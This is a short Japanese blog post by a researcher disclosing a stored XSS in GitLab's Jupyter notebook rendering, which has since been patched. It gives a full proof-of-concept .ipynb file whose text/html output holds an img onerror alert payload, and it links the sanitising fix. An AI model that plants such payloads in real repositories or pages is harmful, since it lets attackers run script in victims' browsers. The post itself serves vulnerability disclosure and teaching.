March 23, 2018

GitLab XSS via .ipynb

GitLabにXSSがあったので報告した。

https://about.gitlab.com/2018/01/16/gitlab-10-dot-3-dot-4-released/

上記リンクのJupyter Notebook XSSというやつ。

PoC

以下の内容のipynbファイルを作成する。
ipynbファイルの実態はJSONである。

{
 "cells": [
  {
   "cell_type": "code",
   "execution_count": 5,
   "metadata": {},
   "outputs": [
    {
     "data": {
      "application/vnd.jupyter.widget-view+json": {
       "model_id": "6653407c18484bc58bb51b233594b300",
       "version_major": 2,
       "version_minor": 0
      },
      "text/html": [
       "<img src='x' onerror='alert(document.domain)' />"
      ],
      "text/plain": [
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": "Python 3",
   "language": "python",
   "name": "python3"
  },
  "language_info": {
   "codemirror_mode": {
    "name": "ipython",
    "version": 3
   },
   "file_extension": ".py",
   "mimetype": "text/x-python",
   "name": "python",
   "nbconvert_exporter": "python",
   "pygments_lexer": "ipython3",
   "version": "3.6.1"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 2
}

text/htmlフィールドの内容はそのままHTMLとしてJupyter Notebookに出力されるので、サニタイズしなければXSSを生じる。
つまり、GitLabのプロジェクト内のipynbを開いただけで発火する蓄積型XSSとなる。

修正

修正内容は以下リンクのコミットを見れば分かる。

https://gitlab.com/gitlab-org/gitlab-ce/commit/54636e1d4293a8465a772020a54b6193d7df9878

許可するタグや属性をホワイトリストで指定する、ごくごく一般的な対処方法。

余談だが、GitLabでは過去にRDocやrstなどのファイルのHTMLレンダリングでもXSSがあった。

MarkdownなどのHTMLレンダリングでもやりがちなので、気をつけたいですね。

このエントリーをはてなブックマークに追加

© Kouhei Morita 2018